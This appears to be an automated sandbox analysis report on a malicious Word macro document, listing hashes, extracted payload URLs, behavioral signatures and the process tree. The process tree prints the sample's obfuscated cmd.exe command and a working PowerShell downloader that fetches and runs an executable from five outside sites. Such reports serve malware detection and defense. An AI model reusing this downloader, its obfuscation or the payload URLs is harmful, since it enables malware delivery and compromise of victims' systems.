Analysis
-
max time kernel
54s -
max time network
33s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
22-11-2024 02:14
Behavioral task
behavioral1
Sample
fd15363835636b0455cd31ed7860dfbc3d06b14cc172e02d68afd26f3962a10f.doc
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
fd15363835636b0455cd31ed7860dfbc3d06b14cc172e02d68afd26f3962a10f.doc
Resource
win10v2004-20241007-en
General
-
Target
fd15363835636b0455cd31ed7860dfbc3d06b14cc172e02d68afd26f3962a10f.doc
-
Size
62KB
-
MD5
8cf2a878780f9f16e7dd5ce997ee9a97
-
SHA1
0f5c26827acc179f7619b847a21de4e63b7bddce
-
SHA256
fd15363835636b0455cd31ed7860dfbc3d06b14cc172e02d68afd26f3962a10f
-
SHA512
e0ba84a3667ee46a042b167a624dcf3c14c2de28cba94dcba1afb6f035c6b52eddeec26a02fff4e2b4ef1ed9fea330169a302d979b7563c37db7903354e1b13d
-
SSDEEP
768:8ooSooooUatoXoooonooqoooUoooooIooUpJcaUitGAlmrJpmxlzC+w99NBD3y6L:QptJlmrJpmxlRw99NB7yZhERepNiqwC
Malware Config
Extracted
http://tomas.datanom.fi/testlab/w0qi46LyvZ
http://www.plasdo.com/MNXfUEtpo
http://vinastone.com/m3qQf5sLVY
http://vaarbewijzer.nl/D50JpVAsc0
http://ruforum.uonbi.ac.ke/wp-content/uploads/afZG2WrC
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 2108 464 cmd.exe 29 -
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid Process 5 2816 powershell.exe 8 2816 powershell.exe 9 2816 powershell.exe -
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
Processes:
cmd.exepid Process 2108 cmd.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
WINWORD.EXEcmd.exepowershell.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Office loads VBA resources, possible macro or embedded object present
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid Process 464 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid Process 2816 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid Process Token: SeDebugPrivilege 2816 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid Process 464 WINWORD.EXE 464 WINWORD.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
WINWORD.EXEcmd.exedescription pid Process procid_target PID 464 wrote to memory of 2108 464 WINWORD.EXE 30 PID 464 wrote to memory of 2108 464 WINWORD.EXE 30 PID 464 wrote to memory of 2108 464 WINWORD.EXE 30 PID 464 wrote to memory of 2108 464 WINWORD.EXE 30 PID 2108 wrote to memory of 2816 2108 cmd.exe 33 PID 2108 wrote to memory of 2816 2108 cmd.exe 33 PID 2108 wrote to memory of 2816 2108 cmd.exe 33 PID 2108 wrote to memory of 2816 2108 cmd.exe 33 PID 464 wrote to memory of 2736 464 WINWORD.EXE 35 PID 464 wrote to memory of 2736 464 WINWORD.EXE 35 PID 464 wrote to memory of 2736 464 WINWORD.EXE 35 PID 464 wrote to memory of 2736 464 WINWORD.EXE 35
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fd15363835636b0455cd31ed7860dfbc3d06b14cc172e02d68afd26f3962a10f.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:464 -
C:\Windows\SysWOW64\cmd.execmd /V/C"s^e^t NnQ=^ ^ ^ ^ ^ ^ ^ ^ ^}}{hct^ac^};kaerb;hZP^$ ^me^tI-^ekovn^I;)^h^ZP$ ^,s^o^j^$(^e^liFdaoln^w^o^D^.rV^S^$^{yr^t{)R^h^l$^ ni^ ^soj^$(^hcaerof^;^'e^xe.^'^+^fo^O^$+^'\^'^+c^il^bu^p:vn^e^$=hZP$;^'^23^8^'^ ^= ^f^o^O^$^;)'@^'(t^i^lpS^.^'Cr^W2G^Z^fa/^sd^ao^l^pu/tnetnoc^-^p^w/^ek.ca^.ibn^ou.^m^urofur//^:pt^t^h@0c^sAV^p^J05^D/^ln.r^e^z^j^iw^e^br^aav//:^ptt^h@^YVLs5fQq3^m/moc^.en^o^t^saniv//^:p^t^t^h@^o^pt^EU^fXN^M/moc^.^o^ds^alp.^www//^:^p^tth^@^Zvy^L^64^iq^0^w/b^alt^se^t/^i^f^.m^ona^t^ad^.^s^amo^t//^:^ptth^'^=Rh^l$^;^tnei^lC^be^W^.teN tc^e^jb^o-^wen=rVS$^ ^l^leh^sr^ew^op&&^f^or /^L %^H in (40^5^;^-1;0)^d^o ^s^e^t k^h=!k^h!!NnQ:~%^H,1!&&^if %^H=^=^0 c^a^l^l %k^h:^~^-^4^06%"2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2108 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell $SVr=new-object Net.WebClient;$lhR='http://tomas.datanom.fi/testlab/w0qi46LyvZ@http://www.plasdo.com/MNXfUEtpo@http://vinastone.com/m3qQf5sLVY@http://vaarbewijzer.nl/D50JpVAsc0@http://ruforum.uonbi.ac.ke/wp-content/uploads/afZG2WrC'.Split('@');$Oof = '832';$PZh=$env:public+'\'+$Oof+'.exe';foreach($jos in $lhR){try{$SVr.DownloadFile($jos, $PZh);Invoke-Item $PZh;break;}catch{}}3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2816
-
-
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2736
-